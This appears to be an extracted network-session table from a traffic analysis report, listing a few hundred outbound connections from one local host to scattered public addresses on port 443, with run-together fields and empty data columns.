                                            15410192.168.2.1534842117.147.171.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15411192.168.2.1544946187.159.0.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15412192.168.2.153506671.92.201.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15413192.168.2.15369448.230.92.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15414192.168.2.1552344196.54.24.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15415192.168.2.153657869.134.159.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15416192.168.2.1559814189.69.213.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15417192.168.2.1543592113.203.243.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15418192.168.2.155388864.133.220.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15419192.168.2.1560970122.57.134.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15420192.168.2.1541220182.104.172.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15421192.168.2.1546232109.252.83.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15422192.168.2.1540544125.106.178.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15423192.168.2.1552184142.235.194.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15424192.168.2.1535904205.65.38.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15425192.168.2.1538806122.23.75.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15426192.168.2.1537998164.50.119.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15427192.168.2.15600988.77.136.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15428192.168.2.1557590103.164.169.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15429192.168.2.1557072126.247.70.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15430192.168.2.1541664185.152.198.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15431192.168.2.1539824182.66.233.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15432192.168.2.1549650161.9.49.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15433192.168.2.1560872110.39.87.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15434192.168.2.1552738182.138.216.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15435192.168.2.155058673.211.206.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15436192.168.2.1546338197.48.231.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15437192.168.2.154660068.179.80.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15438192.168.2.155169459.25.210.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15439192.168.2.1557124187.54.58.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15440192.168.2.1547880163.113.192.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15441192.168.2.1546270210.157.219.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15442192.168.2.1547772120.113.247.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15443192.168.2.154289627.129.224.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15444192.168.2.1553010114.245.207.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15445192.168.2.1535378121.206.125.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15446192.168.2.1535928182.112.253.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15447192.168.2.1542722170.118.116.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15448192.168.2.153332888.206.238.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15449192.168.2.1545510182.175.201.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15450192.168.2.1560970154.241.68.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15451192.168.2.156069697.161.159.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15452192.168.2.1558170201.229.88.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15453192.168.2.155828444.59.48.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15454192.168.2.1538486154.59.168.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15455192.168.2.1544844141.181.253.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15456192.168.2.155567488.110.234.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15457192.168.2.154189257.242.132.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15458192.168.2.155889619.236.154.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15459192.168.2.154762036.245.135.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15460192.168.2.1537974181.75.84.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15461192.168.2.154921425.163.53.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15462192.168.2.1537212197.51.10.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15463192.168.2.154918844.252.40.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15464192.168.2.153944640.236.29.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15465192.168.2.1540672158.23.255.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15466192.168.2.153899687.218.38.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15467192.168.2.153951254.173.138.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15468192.168.2.1553138170.34.210.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15469192.168.2.1556934202.130.134.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15470192.168.2.1534624197.149.41.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15471192.168.2.1557376105.5.63.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15472192.168.2.1543558211.69.238.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15473192.168.2.153975878.110.178.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15474192.168.2.1560216164.150.248.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15475192.168.2.1543800112.221.83.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15476192.168.2.1560758168.122.60.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15477192.168.2.154083039.113.135.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15478192.168.2.155707217.94.16.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15479192.168.2.1554826102.51.209.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15480192.168.2.154837450.104.166.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15481192.168.2.155596634.83.183.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15482192.168.2.153290698.149.166.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15483192.168.2.15539085.224.149.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15484192.168.2.154535837.49.118.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15485192.168.2.155479879.92.232.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15486192.168.2.1537334202.188.112.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15487192.168.2.1541256188.231.231.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15488192.168.2.1551940169.76.33.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15489192.168.2.1555024191.55.93.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15490192.168.2.154284291.34.102.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15491192.168.2.1543634208.43.6.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15492192.168.2.154852249.237.201.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15493192.168.2.1547104178.72.3.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15494192.168.2.1551492180.59.15.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15495192.168.2.153513871.200.212.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15496192.168.2.1553376179.84.194.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15497192.168.2.154124645.209.50.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15498192.168.2.154528077.27.153.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15499192.168.2.153851688.2.134.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15500192.168.2.15503942.10.165.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15501192.168.2.155210250.97.53.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15502192.168.2.1548556160.1.199.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15503192.168.2.1559698133.77.33.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15504192.168.2.154593437.198.150.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15505192.168.2.154681283.5.95.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15506192.168.2.154552678.176.94.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15507192.168.2.153941450.150.195.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15508192.168.2.1555202154.247.65.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15509192.168.2.154008079.34.17.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15510192.168.2.155482485.254.191.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15511192.168.2.1558172120.218.110.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15512192.168.2.1557764187.38.104.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15513192.168.2.1537052120.185.109.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15514192.168.2.1550528146.172.43.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15515192.168.2.155381425.219.63.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15516192.168.2.1550140137.184.61.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15517192.168.2.1538724154.231.40.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15518192.168.2.154308684.11.23.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15519192.168.2.1554640132.83.87.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15520192.168.2.1539254100.133.66.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15521192.168.2.1538124109.214.57.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15522192.168.2.15517689.116.93.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15523192.168.2.1548412176.248.46.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15524192.168.2.155606261.214.148.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15525192.168.2.154123275.173.88.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15526192.168.2.1540910114.96.165.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15527192.168.2.1539114183.146.141.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15528192.168.2.1533014119.235.214.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15529192.168.2.155396679.214.201.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15530192.168.2.153660237.48.222.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15531192.168.2.1558568130.220.17.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15532192.168.2.1558146144.3.166.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15533192.168.2.1557878213.129.168.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15534192.168.2.156089238.108.17.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15535192.168.2.1549666120.131.164.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15536192.168.2.1543220111.107.128.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15537192.168.2.154211097.235.199.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15538192.168.2.154227498.18.253.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15539192.168.2.1549590176.216.58.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15540192.168.2.1541976194.205.89.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15541192.168.2.1543654202.93.31.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15542192.168.2.1547240177.19.172.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15543192.168.2.1556992164.184.3.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15544192.168.2.154297046.154.97.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15545192.168.2.155395099.36.128.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15546192.168.2.1539246110.134.238.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15547192.168.2.154933864.242.44.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15548192.168.2.155381824.193.16.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15549192.168.2.15343741.94.100.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15550192.168.2.155707446.53.51.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15551192.168.2.156055267.24.92.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15552192.168.2.154748257.132.167.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15553192.168.2.155286290.37.6.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15554192.168.2.1545630223.41.152.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15555192.168.2.1544430201.66.226.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15556192.168.2.154335271.65.179.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15557192.168.2.153308223.87.140.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15558192.168.2.1557914169.217.72.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15559192.168.2.155803061.77.38.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15560192.168.2.153458470.163.25.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15561192.168.2.1558762140.102.5.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15562192.168.2.155738674.177.116.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15563192.168.2.1556708132.153.205.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15564192.168.2.153716085.38.226.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15565192.168.2.1553604124.158.150.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15566192.168.2.1553034129.195.10.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15567192.168.2.154769870.127.13.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15568192.168.2.156042090.87.203.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15569192.168.2.1537838173.21.187.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15570192.168.2.15371481.135.105.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15571192.168.2.1554870123.155.198.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15572192.168.2.1541552137.77.75.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15573192.168.2.1546702217.204.133.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15574192.168.2.1547034107.133.151.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15575192.168.2.154794452.86.82.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15576192.168.2.1544010144.75.189.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15577192.168.2.153306081.70.234.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15578192.168.2.1546304221.76.105.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15579192.168.2.1538224204.164.243.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15580192.168.2.1537602130.37.51.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15581192.168.2.1539288158.143.228.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15582192.168.2.1555246199.45.9.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15583192.168.2.1555380104.125.119.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15584192.168.2.155696417.19.78.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15585192.168.2.154797062.89.123.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15586192.168.2.1549950204.224.171.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15587192.168.2.1543752213.242.110.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15588192.168.2.1538118161.195.115.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15589192.168.2.1549160153.196.239.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15590192.168.2.153435476.106.223.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15591192.168.2.1540556180.238.215.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15592192.168.2.1554066133.204.177.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15593192.168.2.1554430173.219.93.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15594192.168.2.154035477.106.121.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15595192.168.2.1547206115.32.188.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15596192.168.2.1546148112.161.52.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15597192.168.2.154357497.93.209.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15598192.168.2.1537782147.139.184.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15599192.168.2.1560446198.40.40.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15600192.168.2.155198684.210.182.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15601192.168.2.155587092.55.135.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15602192.168.2.1549772169.215.32.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15603192.168.2.1538890119.57.199.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15604192.168.2.154291668.248.230.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15605192.168.2.1558654180.180.40.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15606192.168.2.153282092.9.132.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15607192.168.2.1543984130.177.47.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15608192.168.2.1536118206.102.13.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15609192.168.2.15393882.56.221.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15610192.168.2.155389448.251.121.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15611192.168.2.1535942111.78.97.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15612192.168.2.1556316201.233.250.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15613192.168.2.153845864.19.138.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15614192.168.2.1534468133.190.29.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15615192.168.2.1541786166.41.143.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15616192.168.2.154629046.157.191.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15617192.168.2.1540250131.195.30.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15618192.168.2.1550276148.235.192.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15619192.168.2.1556986135.3.55.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15620192.168.2.1545182190.14.210.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15621192.168.2.1536366112.64.163.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15622192.168.2.1536436113.130.163.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15623192.168.2.1556610119.195.0.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15624192.168.2.155161895.27.11.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15625192.168.2.1534370148.144.40.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15626192.168.2.1541796129.42.38.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15627192.168.2.1532974154.244.39.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15628192.168.2.153966098.85.175.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15629192.168.2.1557384119.149.72.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15630192.168.2.1550216156.245.234.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15631192.168.2.1549822138.4.100.32443
                                            TimestampBytes transferredDirectionData


